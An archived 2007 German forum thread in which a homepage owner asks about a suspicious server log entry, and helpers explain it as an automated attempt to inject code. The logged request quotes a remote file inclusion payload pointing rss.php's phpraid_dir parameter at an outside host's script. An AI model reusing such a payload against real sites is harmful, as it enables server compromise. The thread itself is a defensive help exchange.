1. Liebe Forumsgemeinde,

    aufgrund der Bestimmungen, die sich aus der DSGVO ergeben, müssten umfangreiche Anpassungen am Forum vorgenommen werden, die sich für uns nicht wirtschaftlich abbilden lassen. Daher haben wir uns entschlossen, das Forum in seiner aktuellen Form zu archivieren und online bereit zu stellen, jedoch keine Neuanmeldungen oder neuen Kommentare mehr zuzulassen. So ist sichergestellt, dass das gesammelte Wissen nicht verloren geht, und wir die Seite dennoch DSGVO-konform zur Verfügung stellen können.
    Dies wird in den nächsten Tagen umgesetzt.

    Ich danke allen, die sich in den letzten Jahren für Hilfesuchende und auch für das Forum selbst engagiert haben. Ich bin weiterhin für euch erreichbar unter tti(bei)pcwelt.de.
    Dismiss Notice

Unbekannter Logeintrag

Discussion in 'Web-Know-how für die Homepage' started by bullfrog, Mar 26, 2007.

Thread Status:
Not open for further replies.
  1. bullfrog

    bullfrog Byte

    Hallo
    Beim letzten Besucher meiner HP, wurde folgendes protokolliert:

    /Fotogallerie/rss.php?phpraid dir=http://212.78.204.20/vivalarevolution/p.in??

    Kann mir das einer erklären.

    bullfrog
     
    bullfrog, Mar 26, 2007
    #1
  2. kalweit

    kalweit Hüter der Glaskugel

    Wer oder was hat das protokolliert? Sollte das aus dem Serverlog sein, dann poste mal die komplette Zeile.
     
    kalweit, Mar 26, 2007
    #2
  3. bullfrog

    bullfrog Byte

    Das Log wird von meinem Hoster aufgezeichnet.
    Logeintrag:

    Host 212.59.153.60
    /Fotogallerie/rss.php?phpraid dir=http://212.78.204.20/vivalarevolution/p.in??
    HTTP Code: 200 HTTP Version/1.1 Grösse 5853Bytes
    Referer -- Agent Mozilla/4.0

    Danach wird der Rest meiner HP abgerufen, soweit ich das erkennen kann.

    bullfrog

    Google ich die 212.78.204.20 werden nicht gerade positive Treffer angezeigt. http://board.protecus.de/t16744.htm
     
    bullfrog, Mar 26, 2007
    #3
  4. kalweit

    kalweit Hüter der Glaskugel

    Da versucht jemand einen Parameter in das Script rss.php einzuschleusen. Es soll beim Aufruf des Scripts die in "dir" enthaltene Datei durch dein Script geladen und ausgeführt werden. In wie weit das wirklich passiert, muss du selbst prüfen.
     
    kalweit, Mar 26, 2007
    #4
  5. bullfrog

    bullfrog Byte

    Das rss.php wird doch ausgeführt, wenn ich auf den RSS-Button drücke? Ich habe jetzt RSS für die Gallerie abgeschaltet, da von mir nicht benötigt. Bringt das Ändern der Passwörter etwas?

    Da ich mich überhaupt nicht auskenne, habe ich sicherheitshalber meinen Hoster per Mail informiert. Vor morgenfrüh kommt aber keine Antwort.

    Danke bullfrog
     
    bullfrog, Mar 27, 2007
    #5
  6. kalweit

    kalweit Hüter der Glaskugel

    Nein. Das hat mit Passwörtern nichts zu tun. Man muss sich den Quellcode der rss.php ansehen, ob der Angriff Wirkung zeigt oder nicht. Genauso gut möglich (vermutlich sogar wahrscheinlich), dass der Angriff einer veralteten Version deiner Gallerie gilt und dich überhaupt nicht mehr betrifft. Dann ist es halt nicht mehr, als ein Eintrag im Logfile.
     
    kalweit, Mar 27, 2007
    #6
  7. bullfrog

    bullfrog Byte

    Gut, den Rest der Nacht werd ich Mäuse schubsen, Puppen hab ich keine. Bin gespannt was mir der Support vom Hoster morgen melden kann.

    Nochmals vielen Dank und eine ruhige Nacht

    bullfrog
     
    bullfrog, Mar 27, 2007
    #7
  8. bullfrog

    bullfrog Byte

    Also, der Support meint, dass es nach einem automatisierten Versuch ausgesehen hat, an verschiedenen Stellen Code einzuschleusen. Betonung auf Versuch. Ein Update der Fotogallerie muss ich noch durchführen.

    Gruss

    bullfrog
     
    bullfrog, Mar 27, 2007
    #8
Thread Status:
Not open for further replies.

Share This Page